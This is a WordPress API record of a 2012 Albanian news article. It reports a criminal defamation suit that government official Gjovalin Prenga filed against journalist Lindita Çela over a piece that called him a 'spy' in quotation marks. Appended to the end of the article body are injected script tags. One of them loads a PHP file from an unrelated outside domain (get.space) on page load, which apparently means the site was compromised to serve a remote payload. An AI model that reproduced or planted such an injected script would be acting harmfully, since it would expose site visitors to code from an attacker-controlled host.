{"id":530,"date":"2012-09-28T16:04:05","date_gmt":"2012-09-28T14:04:05","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=530"},"modified":"2013-10-02T16:06:27","modified_gmt":"2013-10-02T14:06:27","slug":"padi-penale-per-gazetaren-cela-ekspozoi-te-shkuaren-e-zyrtarit-te-qeverise","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=530","title":{"rendered":"Padi penale p\u00ebr gazetaren \u00c7ela, ekspozoi t\u00eb shkuar\u00ebn e zyrtarit t\u00eb qeveris\u00eb"},"content":{"rendered":"<h2>Drejtori i Kryeministris\u00eb, Gjovalin Prenga, pretendon se \u00ebsht\u00eb cenuar nga p\u00ebrdorimi i fjal\u00ebs \u201cspiun\u201d<\/h2>\n<p>Gazetarja e gazet\u00ebs \u201cShekulli\u201d, Lindita \u00c7ela, u padit penalisht n\u00eb Gjykat\u00ebn e Tiran\u00ebs nga Gjovalin Prenga, drejtor i Marr\u00ebdh\u00ebnieve me Publikun n\u00eb Kryeministri, nj\u00eb ngjarje kjo q\u00eb konsiderohet nga gazetar\u00ebt si nj\u00eb akt presioni ndaj medias n\u00eb t\u00ebr\u00ebsi, ushtruar\u00a0 drejtp\u00ebrs\u00ebdrejti nga qeveria.<\/p>\n<p>Prenga e ka ngritur padin\u00eb e tij p\u00ebr shpifje n\u00eb baz\u00eb t\u00eb nenit 102 t\u00eb Kodit Penal n\u00eb shkurt t\u00eb k\u00ebtij viti, duke pretenduar se gazetarja \u00c7ela i ka cenuar personalitetin n\u00eb nj\u00eb shkrim t\u00eb publikuar tetorin e kaluar. Neni 102 e d\u00ebnon shpifjen me gjob\u00eb deri n\u00eb dy vjet burg.<\/p>\n<p>\u201cPadia mbart elemente qesharake\u201d, tha \u00c7ela dje p\u00ebr gazet\u00ebn \u201cShqip\u201d.<\/p>\n<p>\u201cShkrimi \u00ebsht\u00eb b\u00ebr\u00eb tetorin e kaluar, por vet\u00ebm n\u00eb shkurt t\u00eb k\u00ebtij viti, zyrtari Prenga e ka par\u00eb t\u00eb arsyeshme t\u00eb ngrej\u00eb padi. Kjo distanc\u00eb kohore nga ngjarja te padia, m\u00eb b\u00ebn t\u00eb mendoj se padia nuk lidhet thjesht me shkrimin\u201d, thot\u00eb \u00c7ela.<\/p>\n<p>Preng\u00ebs iu dha e drejta e replik\u00ebs ndaj shkrimit n\u00eb fjal\u00eb menj\u00ebher\u00eb pas publikimit t\u00eb lajmit, ku tha se fakti q\u00eb pati punuar n\u00eb Ministrin\u00eb e Brendshme, nuk mund t\u00eb sh\u00ebrbente p\u00ebr klasifikimin e tij si spiun i Sigurimit t\u00eb Shtetit. Sipas Preng\u00ebs, n\u00eb koh\u00ebn kur ai \u00ebsht\u00eb em\u00ebruar n\u00eb Ministrin\u00eb e Brendshme, dega e Sigurimit t\u00eb Shtetit qe ndar\u00eb nga Ministria p\u00ebr t\u00eb krijuar Sh\u00ebrbimin Informativ Komb\u00ebtar.<\/p>\n<h4>Spiuni n\u00eb thonj\u00ebza<\/h4>\n<p>N\u00eb tetor 2011, Shaban Memija, n\u00eb at\u00eb koh\u00eb kreu i Agjencis\u00eb s\u00eb Legalizimit, Urbanizimit dhe Integrimit t\u00eb Zonave Informale, akuzoi nj\u00ebrin prej drejtor\u00ebve t\u00eb agjencis\u00eb s\u00eb tij p\u00ebr t\u00eb shkuar t\u00eb dyshimt\u00eb t\u00eb lidhur me Ministrin\u00eb e Pun\u00ebve t\u00eb Brendshme n\u00eb vitet e fundit t\u00eb komunizmit. Memija shp\u00ebrndau n\u00eb shum\u00eb media nj\u00eb dokument t\u00eb nxjerr\u00eb nga arkivat e Ministris\u00eb s\u00eb Brendshme, ku tregohej se drejtori Ferdinand Shehu, pati fshehur nga CV-ja e tij nj\u00eb periudh\u00eb 4-vje\u00e7are, gjat\u00eb s\u00eb cil\u00ebs pati punuar n\u00eb Ministrin\u00eb e Pun\u00ebve t\u00eb Brendshme. Deklarata e Memis\u00eb shoq\u00ebrohej me nj\u00eb dokument n\u00eb vitit 1992, t\u00eb Ministris\u00eb s\u00eb Brendshme, me vul\u00ebn \u201csekret\u201d ku urdh\u00ebrohej marrja n\u00eb pun\u00eb e 13 vet\u00ebve, mes t\u00eb cil\u00ebve, edhe z. Shehu.<\/p>\n<p>Gazetarja Lindita \u00c7ela e analizoi m\u00eb tej k\u00ebt\u00eb shkres\u00eb dhe i rezultoi se edhe dy ish-deputet\u00eb t\u00eb Partis\u00eb Demokratike, sot zyrtar\u00eb t\u00eb qeveris\u00eb, Gjovalin Prenga dhe Safet Sula, qen\u00eb gjithashtu em\u00ebruar p\u00ebr t\u00eb punuar n\u00eb Ministrin\u00eb e Brendshme.<\/p>\n<p>Lajmi me titullin \u201cMemia zbulon dhe \u201cspiun\u00ebt\u201d pran\u00eb Kryeministrit Berisha\u201d, u publikua m\u00eb 7 tetor 2011.<\/p>\n<p>Sipas aktpadis\u00eb t\u00eb dor\u00ebzuar n\u00eb gjykat\u00eb nga Prenga, ky i fundit nuk hedh posht\u00eb v\u00ebrtet\u00ebsin\u00eb e dokumentit dhe as t\u00eb shkuar\u00ebn e tij si punonj\u00ebs i Ministris\u00eb s\u00eb Brendshme, por pretendon se p\u00ebrdorimi i fjal\u00ebs \u201cspiun\u201d \u00ebsht\u00eb i pavend dhe d\u00ebmtues p\u00ebr t\u00eb.<\/p>\n<p>Prenga k\u00ebrkon q\u00eb n\u00eb rast se gjykata i jep t\u00eb drejt\u00eb, vendimi i gjykat\u00ebs t\u00eb publikohet n\u00eb m\u00ebnyr\u00eb t\u00eb p\u00ebrs\u00ebritur nga gazeta \u201cShekulli\u201d dhe q\u00eb kjo e fundit t\u00eb paguaj\u00eb ripublikimin e vendimit n\u00eb pes\u00eb gazeta t\u00eb tjera.<\/p>\n<p>\u201cGazetarja ka qen\u00eb korrekte n\u00eb raportimin e lajmit, pasi edhe fjal\u00ebn spiun e ka p\u00ebrdorur n\u00eb thonj\u00ebza\u201d, komentoi dje Andi Kananaj, avokat i qendr\u00ebs \u201cRespublica\u201d, i cili ka marr\u00eb p\u00ebrsip\u00ebr t\u00eb ndihmoj\u00eb mbrojtjen ligjore t\u00eb gazetares \u00c7ela n\u00eb Gjykat\u00eb.<\/p>\n<p>\u201cKy proces gjyq\u00ebsor, nga organizata jon\u00eb konsiderohet si nj\u00eb d\u00ebshmi\u00a0 e agresivitetit q\u00eb zyrtar\u00eb t\u00eb till\u00eb t\u00eb lart\u00eb manifestojn\u00eb ndaj gazetar\u00ebve p\u00ebr shkrimet e tyre t\u00eb cilat bazohen mbi referenca dhe dokumente t\u00eb afishuara publike\u201d, tha Unioni i Gazetar\u00ebve n\u00eb nj\u00eb njoftim p\u00ebr shtyp, duke ofruar mb\u00ebshtetje t\u00eb plot\u00eb morale dhe materiale p\u00ebr gazetaren \u00c7ela.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Drejtori i Kryeministris\u00eb, Gjovalin Prenga, pretendon se \u00ebsht\u00eb cenuar nga p\u00ebrdorimi i fjal\u00ebs \u201cspiun\u201d Gazetarja e gazet\u00ebs \u201cShekulli\u201d, Lindita \u00c7ela, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":531,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/530"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=530"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/530\/revisions"}],"predecessor-version":[{"id":532,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/530\/revisions\/532"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/531"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}